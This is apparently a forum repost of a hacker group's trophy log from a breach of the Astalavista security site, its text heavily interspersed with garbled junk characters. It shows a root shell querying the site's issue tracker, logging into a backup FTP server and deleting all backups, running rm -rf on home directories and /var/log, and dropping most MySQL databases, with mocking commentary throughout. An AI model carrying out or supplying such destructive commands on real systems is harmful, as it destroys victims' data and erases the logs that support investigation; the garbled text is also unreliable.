. |8 E/ f% h6 l# W. [9 Q. M
# F* N$ p/ Y! T* @|
8 D  s% Y2 m+ o. z+————————+——————————————————————————————————————————————————————————————————————————————+
* M  G- {' e) }1 row in set (0.00 sec)& @& ~; o& W  e8 I7 G" `
: x5 c0 q$ ^$ H6 O- _) [# H; o
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…! A, a/ W% {# a% }( {' {( r

2 o0 p# H9 p. t% \% r! D. H* Rmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;  Y/ W! |1 Z- F* J$ Q
+——————+———————————————————————————————+
: F) T/ x" K/ k| iss_summary      | iss_description                                                                             |* t& I& ^# v; n0 C( [! u" {
+——————+———————————————————————————————+
7 j, J" H2 j( q  \0 O9 O/ ~| Website guidance | Virtual Girl which guides you trought the website.8 F8 f$ ?* I5 g; {. A

$ J+ V3 S) ]8 s  k7 m: _We need a girl with who you can ( talk )!!!/ J& z' ~" |; N2 m; P& Q0 H
Also for the News!/ w1 S# e5 X) W7 K
So my suggestion is a girl who read you the news loud if you like!
8 E9 T4 T. Q: G  n! R) M: `2 Yyou can choose between read yourselfe or she read it for you or both!2 t) E- G8 `' x5 k9 A+ v

, A! o9 c! L" R, k* g$ eGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!) I- L; `. b% t8 |  ?
1 Y* K' A8 `0 G
Have a look on the example girls!!2 Y) A1 e  W6 k5 R: H
9 p1 R/ @0 Q+ v( v/ n( a
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]/ b( o& t% ?# W5 W2 e  h
. o5 \" _4 K$ D3 r& A
or that
7 R4 O/ |7 m6 N" H' ]4 b; a0 n
; W: Q4 g/ ]6 a6 @链接标记[url]http://www.yellostrom.de/[/url]) O+ v: Y+ E& t- F. e

5 u8 k! A$ x4 s9 e/ t" B$ T|4 B  V( K; J- p* s1 @0 f1 I! v
+——————+———————————————————————————————+7 Z# r: Q$ {% Z; [) ]" b$ M! u
1 row in set (0.00 sec)' n5 }" d: N. j6 H; ]+ {/ s. ^( t

" b! S6 I: |" ^1 m6 b4 Q// ha ha.0 ^* n3 o  H/ j" W8 V: g  m) ~. {
) j+ i; J$ j0 M5 j6 E3 J
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
) _* U# t2 r3 ]8 C9 u  A4 k+————————–+———————————————————————————————————–+
  q% W: T9 ^7 y) i+ t" || iss_summary              | iss_description                                                                                           |
( @/ H7 g7 I2 \0 G5 j+————————–+———————————————————————————————————–+
8 ?1 X/ f5 L8 @6 m, T0 @| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |! r* s6 e. s% [( m4 V. z) f# k
+————————–+———————————————————————————————————–+
; Y( ?! a4 \0 D7 [  S% H' O  P1 D1 row in set (0.00 sec)
6 _3 E- Q/ v. K/ M" m7 `/ D* @) o4 E: d/ {( z$ ^' W4 `
// LOL.
9 L, [8 [; N) i: B1 b7 F) _2 B
2 n4 \; n* S1 b6 x+ Nmysql> exit
/ A( _$ S6 m; S, o& O& v- PBye
9 X# L; M; M/ Y. F9 |+ y2 M; t6 E( s/ q& K6 B
sh-3.2# ftp 212.254.194.163: {! [: B1 ^9 V, R% \
Connected to 212.254.194.163.
# w" G/ B; F0 L* z3 ^220 BackupCOM_VW FTP server ready." t7 E$ I$ i: _. L( p# H2 a
504 AUTH: security mechanism ‘GSSAPI’ not supported.
6 ]6 e9 c$ X, d! X: O504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
+ M8 Y6 W9 E: a) G7 R6 b* \) ~/ ]" ?KERBEROS_V4 rejected as an authentication type. Y3 g% j* k- r  ^" @! e
Name (212.254.194.163:root): astalavista.com; j6 z1 M, c- A9 s6 V
331 Password required for astalavista.com.2 p5 J* J: U0 \3 Z
Password:
2 f. F" g4 @# ^: m  h6 ]; V230 User astalavista.com logged in.- K6 H( e, b; K- ]
Remote system type is UNIX.
: q; ?9 m+ V! \+ s/ K8 R, pUsing binary mode to transfer files.
" T6 V9 ^; H6 I$ y7 T* v. a7 r- H8 Fftp> ls -la6 B. C- v. M4 F$ P+ Q4 I
227 Entering Passive Mode (212,254,194,163,2,188)( R( Q+ v' f4 d3 D$ j/ F: C% @
150 Opening BINARY mode data connection for ‘file list’.# z& R% W$ T9 c; b
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com
' v: h* J9 Y3 p# d226 Transfer complete.
8 }) ^4 L6 w6 yftp> cd astalavista.com4 [# n6 K3 l% V# T
250 CWD command successful.
+ L0 P8 g, S) g) J9 }8 |+ [ftp> ls -la' ^9 d1 w5 ], |. I0 Z
227 Entering Passive Mode (212,254,194,163,2,189)
  T, Q3 P% j3 K- C- N150 Opening BINARY mode data connection for ‘file list’.
* l0 P  b; a, S$ [-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar# X, F8 o, ]2 E* a
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
- o7 m$ _! O6 @! U  R-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz21 t( I! m; s6 }) ^4 O" b
-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar8 L) {9 b+ ^( _) p
-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar8 U( t' S8 o8 b& C( x
[snip]6 S% Q6 d" C2 x* [1 ~$ x
226 Transfer complete.
9 }' @6 d5 o8 M( z2 pftp> mdelete *) i0 h, a  z; h* D. c
ftp> ls -la
7 ^# {% i) X% F5 S' e227 Entering Passive Mode (212,254,194,163,2,193)
0 Y! p% w3 c7 D3 q+ f150 Opening BINARY mode data connection for ‘file list’.
* N/ o/ u' U' j9 ?226 Transfer complete.
' Q, L! Y3 u: S9 x; Lftp>
  m  J3 N; q/ ^( y5 L' S7 G; _
2 d+ `7 d2 O+ f5 g# ~' Gsh-3.2# cd /home
% w2 l4 w. [& {( V+ X2 ?! vsh-3.2# ls -la
: v5 F& O- i9 ntotal 120; d& t9 [" F3 Z
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
; R5 F  b) g" N' Gdrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..& _9 W+ d4 A* r  I  u- j3 y5 E
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
8 [/ C5 |. S* B2 n+ C-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group+ s) Q) N  R5 `) }% l# A8 s/ y
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user$ X- h% o+ `6 [; w, i  R+ `# w' m; k2 ]
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet* M: k1 c2 a9 b, w2 E5 u- A
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 J1 U/ `# X, W5 D& G" J
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161" W- k+ h, h5 Y6 {2 f# y6 F; l
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
- x1 s0 e/ R: {" L$ M( P0 Z) h5 o2 Kdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp2 C! Y" O: _) _9 l% P- B
drwx——  3 jon     jon      4096 Sep 21  2007 jon4 B7 X% z& l) C/ [5 T
drwx——  2 root    root    16384 Sep 11  2007 lost+found
) G: u, \0 [$ b6 A9 _4 h' idrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
6 h$ Q& C+ d- ^7 y  Vdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata5 C7 ?3 j( y& O/ P$ M
drwx——  2 jon     jon      4096 Sep 15  2007 test
. z- j5 W, @% p& d9 Edrwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp4 Y1 S* e; r0 e: ?
& H7 Y! }, e4 d1 L
sh-3.2# rm -rf backup/5 B' z* \0 j2 |) U0 [; a2 L
sh-3.2# rm -rf backup.14161/& C# A( r! {0 `2 F
sh-3.2# rm -rf ftp/4 j( P$ m5 |3 j8 ~2 Y. e4 g$ Z
sh-3.2# rm -rf jon/% e) y% ^1 l. v# r: t) o* I
sh-3.2# rm -rf my/
. R! V) W" M3 i+ t  Bsh-3.2# rm -rf mysqldata/
$ W" S* |+ Y) f0 B& l' ish-3.2# rm -rf test/8 o" B, L  H1 \, v  o; F
sh-3.2# rm -rf tmp/
2 x. ^) B2 M/ R8 T9 G& q/ qsh-3.2# cd ~
9 B5 [; [2 w8 ~+ |sh-3.2# rm -rf *3 m8 ]& o/ B0 Z, k% H% A4 {# p
sh-3.2# rm -rf /var/log// K. q( U/ R; g- }
rm: cannot remove directory `/var/log//proftpd’: Directory not empty& _: _9 Z% C( N0 ]) r0 U
sh-3.2# rm -rf /home/*
0 J1 X, l. v, I$ c1 msh-3.2# mysql
7 a; G( R3 m- y) s. kWelcome to the MySQL monitor.  Commands end with ; or \g.
4 z) K( l5 P  g$ M: A% R/ w8 JYour MySQL connection id is 407156
" l' ?+ J7 E- x, [+ G% AServer version: 5.0.45-community-log MySQL Community Edition (GPL), @& D9 k# N( R5 R; |* [  V2 _

0 a6 D% n9 K0 l) OType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 O5 r. u) k4 V9 O
8 B. i$ S' g" k; Ymysql> show databases;
1 |* b9 p. |8 y* b# U+———————–+: X6 i, e3 w8 s+ u( t. S
| Database              |
9 r- C1 D' C7 p$ R+———————–+
# U6 R! H! p0 b$ F, W9 c: W| information_schema    |) @0 k) B8 ?  w* h( G
| astanet_ads           |
! _2 d) i1 @6 J$ T| astanet_mailing_lists |
! {2 U3 ^7 O! t3 g8 l' U| astanet_mediawiki     |
8 [6 K6 J' U9 y2 G| astanet_membersystem  |+ o6 ~9 [+ z+ ^; A" Y% n
| com_contrexx          |, K* p2 Y! L+ |, n" h1 s
| com_contrexx2         |
+ }7 p: K* C9 J, D" R8 E! `) I| com_contrexx2_live    |
6 @7 U' M$ l) @  Z' t) O| da_roundcube          |
, R7 }' Z% i. ^2 m( l| dolphin               |
/ B2 \% L& N. p. f; N, K| ideapool              |
; }: }8 c4 n: ^" e( L| mysql                 |
6 j, z, ]* z8 B- s2 F% a- `& n; X| test                  |
+ e/ ]% m& a" f" ^; N  s$ T# Q. A| yourmaster            |
- `$ z, \) M" k. Z3 C+———————–+/ I0 J9 e9 ?5 V, K3 ^+ X$ \
14 rows in set (0.03 sec)* c2 O4 e) ], {9 ]2 M6 k" ?
8 o2 b% [  {9 F3 l" N) @& N. q& A
mysql> drop database astanet_membersystem;
6 [) ?- M/ n+ S& K* ndroQuery OK, 46 rows affected (0.81 sec)
# X) U/ [! H7 l6 _: e' q8 r+ U0 P  S) p( J3 G; W5 x
mysql> drop database com_contrexx;8 V5 I' x; ~5 n2 ~$ p  R% ]
Query OK, 211 rows affected (2.72 sec)
9 e# q5 g% t- d' L- a+ ?4 V
1 F; Q2 e1 U6 u' {mysql> drop database com_contrexx2;
) r, M6 O# I4 R( o6 ~Query OK, 237 rows affected (2.23 sec)4 H; {3 j* r: `. e( \$ F# ?$ z
2 [  ^7 Q- J  z+ V0 @
mysql> drop database com_contrexx2_live;
$ f" W6 ?! w2 \9 k0 Q* RQuery OK, 227 rows affected (7.63 sec)
* p2 o* X- C5 T# P1 g# t3 k
3 \: M/ F4 @4 T1 U2 Gmysql> drop database ideapool;
& ^2 T8 m+ A2 G0 p  hQuery OK, 69 rows affected (0.19 sec)( L# P+ L. C, K+ l+ y5 w
$ n. ~8 `6 e& U8 R2 {3 ~
mysql> drop database yourmaster;
- d8 P8 z) a/ [+ I+ @Query OK, 158 rows affected (0.55 sec); J7 T3 [7 X  ?5 u) }. k! g

5 E6 `' O1 a( |$ i/ w% }8 imysql> drop database astanet_ads;# M3 K  z% v, U6 Q, j! z) A  T
Query OK, 9 rows affected (0.11 sec)/ R( L& G6 M, t$ o" B
* l( r$ Q! y6 [0 y
mysql> drop database astanet_mailing_lists;
# K) w' l: E7 `Query OK, 24 rows affected (1.47 sec)
/ h6 A1 x" i4 ?6 m/ e8 @) Q. o; ?! ~. |! J) s6 l0 @
mysql> drop database astanet_mediawiki;; f' R$ a% m4 {* W- y
Query OK, 31 rows affected (0.51 sec)
* G' n8 z) s  R  T. M9 y- s( M8 a2 W' _/ }- r% Q
mysql> show databases;
" q2 Y- j0 O0 f) C+——————–+2 M1 v* ^9 Q7 ^: o+ N' p4 L
| Database           |
, J- m6 q& y9 R6 Y+——————–+
- z6 i" [# g8 L7 }6 y9 D| information_schema |- n) a( x/ R: L) x- A9 Y* P' [; N
| da_roundcube       |
/ x5 t6 n  q, J# G0 I| dolphin            |# L! `  M! Y; }
| mysql              |- u7 D4 \5 S% Q/ z$ R, P# t
| test               |
/ Z) v5 r; P, z' d% s+——————–+! N" h! x9 ]/ A4 @
5 rows in set (0.00 sec). ?4 |6 u# n: a

( l; C  v+ o) a0 OWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
( E- Z" I6 }$ _+ wtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
4 O( ], y7 n( c& a+ e: ^wrong to say this pack of morons *wont be back*.
- [* S  S; ^9 F* ?3 W. _. C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表